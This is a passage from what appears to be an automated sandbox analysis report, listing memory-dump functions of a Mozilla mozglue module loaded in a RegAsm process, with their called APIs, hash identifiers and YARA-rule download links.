                                                                            • Opcode Fuzzy Hash: 211b947d8446e0edfccbaff786d33c418f2b2d5a631f6567252523424394b90c
                                                                            • Instruction Fuzzy Hash: F941E071608B119FC701CF69D88095BFBE4BF89344F149A2DF46987781EB32E958CB91
                                                                            Function 6CC7D210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CC45820,?), ref: 6CC7D21F
                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,6CC45820,?), ref: 6CC7D22E
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6CC45820,?), ref: 6CC7D242
                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,6CC45820,?), ref: 6CC7D253
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6CC45820,?), ref: 6CC7D280
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                            • String ID:
                                                                            • API String ID: 2029485308-0
                                                                            • Opcode ID: af157ffd2c3c7052fc20ea87578e267af2a7a743e6cd22ceef26206d7efe31bf
                                                                            • Instruction ID: 7ca1ad6127c7c973a0aa47377d8f502165f2d0d3e8eb20084850c2b8fc7f6fe6
                                                                            • Opcode Fuzzy Hash: af157ffd2c3c7052fc20ea87578e267af2a7a743e6cd22ceef26206d7efe31bf
                                                                            • Instruction Fuzzy Hash: BA31C5B5A012159BCB10CF98C880AAEBB75FF8A348F244169D954AB701E772EC07C7E1
                                                                            Function 6CC4C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC4C1BC
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC4C1DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                            • String ID:
                                                                            • API String ID: 1885715127-0
                                                                            • Opcode ID: 17fb87425f7c4954f7d2b61885528bfba260a26563a938e8e4051e73ae1fca10
                                                                            • Instruction ID: 7ce8fa3d755e8c7f715c63927bee3d05f4562da7cc39fc17bc1fdf4df9b9f55f
                                                                            • Opcode Fuzzy Hash: 17fb87425f7c4954f7d2b61885528bfba260a26563a938e8e4051e73ae1fca10
                                                                            • Instruction Fuzzy Hash: 8341ADB1D087408FD720DF68C58078ABBE4AF86308F40855EE8889B722F770A558CB92
                                                                            Function 6CC9A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A858
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A87B
                                                                              • Part of subcall function 6CC9A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6CC9A88F,00000000), ref: 6CC9A9F1
                                                                            • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6CC9A8FF
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A90C
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A97E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                            • String ID:
                                                                            • API String ID: 1355178011-0
                                                                            • Opcode ID: ace17e2cdaa41b462901068939d8770369d452a6eb4e6e9fd69b426e84319e8a
                                                                            • Instruction ID: 19675898b83399db239e5b88cd89347c485339591f4c317e569bb437d40a62ba
                                                                            • Opcode Fuzzy Hash: ace17e2cdaa41b462901068939d8770369d452a6eb4e6e9fd69b426e84319e8a
                                                                            • Instruction Fuzzy Hash: D041A1B5E002089FDB00DFE8D885BDEB771FF44324F148629E826AB791E731A945CB91
                                                                            Function 6CC41530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(-00000002,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC4159C
                                                                            • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415BC
                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415E7
                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41606
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41637
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                            • String ID:
                                                                            • API String ID: 733145618-0
                                                                            • Opcode ID: eb4634277809461e843276b5e188d1b364c5ce903a71c98c27deeefc60d37ec4
                                                                            • Instruction ID: f9d7c31c209c4dde9b9054c7e0e45ccc133a1c05bdd6d021715f603d13809219
                                                                            • Opcode Fuzzy Hash: eb4634277809461e843276b5e188d1b364c5ce903a71c98c27deeefc60d37ec4
                                                                            • Instruction Fuzzy Hash: 4F31C472A005148BCB188E6CD8504AE77A9FB81374724CB2DE863DBBD4FB30D9258791
                                                                            Function 6CC9AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AD9D
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9ADAC
                                                                            • free.MOZGLUE(?,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE01
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE1D
                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE3D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 3161513745-0
                                                                            • Opcode ID: 0f94aed9f9e8288490c45f0ea3bcf18d7880e5fefac2d99d93fd19e8b59f146f
                                                                            • Instruction ID: 10bcaa02354316226cd1011811b6f6cbe3df86acbd64ce16145a3b48d94a418c
                                                                            • Opcode Fuzzy Hash: 0f94aed9f9e8288490c45f0ea3bcf18d7880e5fefac2d99d93fd19e8b59f146f
                                                                            • Instruction Fuzzy Hash: 8A3141B1E002159FDB10DF768D44AABB7F8EF88614F158429E94AE7710F7349815CBA0
                                                                            Function 6CC95EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CCADCA0,?,?,?,6CC6E8B5,00000000), ref: 6CC95F1F
                                                                            • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95F4B
                                                                            • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CC6E8B5,00000000), ref: 6CC95F7B
                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CC6E8B5,00000000), ref: 6CC95F9F
                                                                            • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95FD6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                            • String ID:
                                                                            • API String ID: 1389714915-0
                                                                            • Opcode ID: e7588edcbaa0a170840b6dbae2fd1eec7656ed757fee815f605c82653f67b067
                                                                            • Instruction ID: 34b0596da560ceb680a59a4dc4ec3b858fa18c257579680ec46a11c68e7b1d2e
                                                                            • Opcode Fuzzy Hash: e7588edcbaa0a170840b6dbae2fd1eec7656ed757fee815f605c82653f67b067
                                                                            • Instruction Fuzzy Hash: 7231FA353006008FD714CF69C898E2AB7F5FF89329B648698E5578BB95D735EC41CB80
                                                                            Function 6CC3B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC3B532
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC3B55B
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC3B56B
                                                                            • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC3B57E
                                                                            • free.MOZGLUE(00000000), ref: 6CC3B58F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                            • String ID:
                                                                            • API String ID: 4244350000-0
                                                                            • Opcode ID: a7267d40d4e58b96ca0b8d01cf80bd40bc9dfe84475cd246c8b6c53e5130c21e
                                                                            • Instruction ID: ec7394e26f6af462654aa3d55240f11a59f7427cbfa27b1916e3aad7d49cc969
                                                                            • Opcode Fuzzy Hash: a7267d40d4e58b96ca0b8d01cf80bd40bc9dfe84475cd246c8b6c53e5130c21e
                                                                            • Instruction Fuzzy Hash: 5521F371A006159BDB008FA9DC50BAABBB9FF82308F284129E818DB351F776D911C7A1
                                                                            Function 6CC3B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC3B7CF
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B808
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B82C
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3B840
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC3B849
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1977084945-0
                                                                            • Opcode ID: f1319bff4e95f53fa76cc96369157c95abb7e7693c04a81c7e1539ade2311b1e
                                                                            • Instruction ID: f07fee85d804abcb855766203105fbb01820bee1acd53d3a78701083a414295e
                                                                            • Opcode Fuzzy Hash: f1319bff4e95f53fa76cc96369157c95abb7e7693c04a81c7e1539ade2311b1e
                                                                            • Instruction Fuzzy Hash: 71215CB0E002199FDF04DFA9D8956FEBBB4EF49314F14812AEC09A7301E731A945CBA1
                                                                            Function 6CC96E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC96E78
                                                                              • Part of subcall function 6CC96A10: InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96A68
                                                                              • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96A7D
                                                                              • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96AA1
                                                                              • Part of subcall function 6CC96A10: EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96AAE
                                                                              • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96AE1
                                                                              • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96B15
                                                                              • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC96B65
                                                                              • Part of subcall function 6CC96A10: LeaveCriticalSection.KERNEL32(6CCBF618,?,?), ref: 6CC96B83
                                                                            • MozFormatCodeAddress.MOZGLUE ref: 6CC96EC1
                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EE1
                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EED
                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC96EFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                            • String ID:
                                                                            • API String ID: 4058739482-0
                                                                            • Opcode ID: ffc7b7037d56f8755ae055590ba618592c91af8562615bd6d2346920a0f4cab1
                                                                            • Instruction ID: a57dc33438f244fa5b2747a81dd1b61cd68f54e01f44fee7fec404bd645f37af
                                                                            • Opcode Fuzzy Hash: ffc7b7037d56f8755ae055590ba618592c91af8562615bd6d2346920a0f4cab1
                                                                            • Instruction Fuzzy Hash: 0921A171A0421A9FDF00CF69D8C569A77F9EF84348F044039F80997281EB749A59CF96
                                                                            Function 6CC976C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC976F2
                                                                            • moz_xmalloc.MOZGLUE(00000001), ref: 6CC97705
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC97717
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC9778F,00000000,00000000,00000000,00000000), ref: 6CC97731
                                                                            • free.MOZGLUE(00000000), ref: 6CC97760
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 2538299546-0
                                                                            • Opcode ID: c1d42f421a75238e29698f85162fefd56720058de8ef4295d3f38264597f064c
                                                                            • Instruction ID: ec5619616940050764c40aed78584840899dba168bdd5cf3944f8c675c2ebf2b
                                                                            • Opcode Fuzzy Hash: c1d42f421a75238e29698f85162fefd56720058de8ef4295d3f38264597f064c
                                                                            • Instruction Fuzzy Hash: E511C4B1901215ABE710AFB68C44BABBFF8EF45354F044529F848E7300F771985487E2
                                                                            Function 6CC70D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC33DEF), ref: 6CC70D71
                                                                            • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC33DEF), ref: 6CC70D84
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC33DEF), ref: 6CC70DAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Free$Alloc
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                            • API String ID: 1852963964-2186867486
                                                                            • Opcode ID: 6f730dbb6f9c357720b2669d45caf81135c55ce3d955cfe109b6707d376b0632
                                                                            • Instruction ID: ed51de8d2d7eef2df0f80b77432702700bdf6d47bcaf8881dd2f86a48eec840e
                                                                            • Opcode Fuzzy Hash: 6f730dbb6f9c357720b2669d45caf81135c55ce3d955cfe109b6707d376b0632
                                                                            • Instruction Fuzzy Hash: 52F0E93138079423E63012AB4D0AB5B376DFBC2B65F304075F204EE9C0FAA2E80047B8
                                                                            Function 6CC95850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 6CC9586C
                                                                            • CloseHandle.KERNEL32 ref: 6CC95878
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CC95898
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC958C9
                                                                            • free.MOZGLUE(00000000), ref: 6CC958D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CloseHandleObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 1910681409-0
                                                                            • Opcode ID: 3cccefe91040a703f68d8d686051806a1b26e6897f109db7ce2e3edfabe5b371
                                                                            • Instruction ID: 8cb5dbf31703410ab4f413fe42e937b6866be32fc63f2096b07e7063378b6c7b
                                                                            • Opcode Fuzzy Hash: 3cccefe91040a703f68d8d686051806a1b26e6897f109db7ce2e3edfabe5b371
                                                                            • Instruction Fuzzy Hash: 0701627D7441019FDF00DFDADA086067BB8FB83329B644136E419C2310E73198198F9D
                                                                            Function 6CC87620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC875C4,?), ref: 6CC8762B
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87644
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8765A
                                                                            • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87663
                                                                            • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87677
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 418114769-0
                                                                            • Opcode ID: 2b8a37575f70c4ecb85a45a8fe06e1cfe9045c8c864f73656a186ff335a86b5a
                                                                            • Instruction ID: 5f84838fa65a370b81a3812a0cc6e4dc76c691beb0d4ead1002433844cca6dea
                                                                            • Opcode Fuzzy Hash: 2b8a37575f70c4ecb85a45a8fe06e1cfe9045c8c864f73656a186ff335a86b5a
                                                                            • Instruction Fuzzy Hash: 72F0AF71E10785ABD7008F61C898676B778FFEA259F114316F90443611E7B0A5D08BD0
                                                                            Function 6CC91700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC91800
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
